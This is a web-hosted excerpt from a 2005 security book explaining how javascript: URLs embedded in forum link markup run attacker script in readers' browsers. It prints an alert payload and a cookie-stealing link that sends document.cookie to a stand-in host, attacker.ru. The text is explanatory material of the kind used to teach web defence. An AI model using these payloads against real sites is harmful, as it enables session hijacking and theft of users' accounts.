Embedding JavaScript Code into the Address Line

Previous page
Table of content
Next page

Sometimes, it is possible to change the value of the href attribute of the <a> tag but it is impossible to follow the new link. In this case, the attacker can embed JavaScript code that will execute after a user clicks the malicious link.

This situation takes place on forums, chats, or bulletin boards that allow users to specify special sequences that will be converted into links.

An example of this was given earlier: the [A=href]text[/A] construction.

However, unlike the situation described in the previous section, embedding JavaScript into the address line is possible when the vulnerability is absent, that is, when it is impossible to follow a malicious link.

Suppose the attacker creates the following message: 

 [A href=javascript:alert('text')]click me[/A]

As a result of following this link, the browser will try to load the javascript:alert('text') document, but this is a command to the browser to execute the JavaScript code. In other words, malicious code can be executed in any user's browser.

Note 

JavaScript will be executed in the context of the site currently opened in the browser.

This vulnerability can be used for the following:

  • Obtaining the cookie of a random or target user

  • Performing concealed actions on behalf of the administrator

  • Exploiting the session-fixing vulnerability

  • Performing hidden manipulations with the opened page

For example, to steal the cookie of the target user, the attacker could stealthily put a link with the following value of the href attribute: 

 [A=javascript:document.location.href='http://www.attacker.ru/cookie.php?co    OK='+escape(document.cookie)]test[/A]

I already demonstrated how the attacker can circumvent the filtration of quotation marks, write JavaScript code without spaces, and URL-encode it to bypass filters and conceal the presence of the code.

Warning 

JavaScript code embedded into the address line of a browser can work differently on different browsers.

In addition, note that such an attack doesn't need the XSS vulnerability; therefore, it is quite dangerous. The only thing that prevents this technique from being universal is that a user is likely to look at the status bar of the browser and suspect the attack because he or she won't see the usual HTTP:// prefix. In addition, the script won't execute in the context of the currently-opened site if the user opens the link in a new browser window.


Previous page
Table of content
Next page
Hacker Web Exploition Uncovered
Hacker Web Exploition Uncovered
ISBN: 1931769494
EAN: N/A
Year: 2005
Pages: 77
BUY ON AMAZON
Java I/O
MySQL Stored Procedure Programming
Information Dashboard Design: The Effective Visual Communication of Data
Microsoft VBScript Professional Projects
Python Standard Library (Nutshell Handbooks) with
User Interfaces in C#: Windows Forms and Custom Controls
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy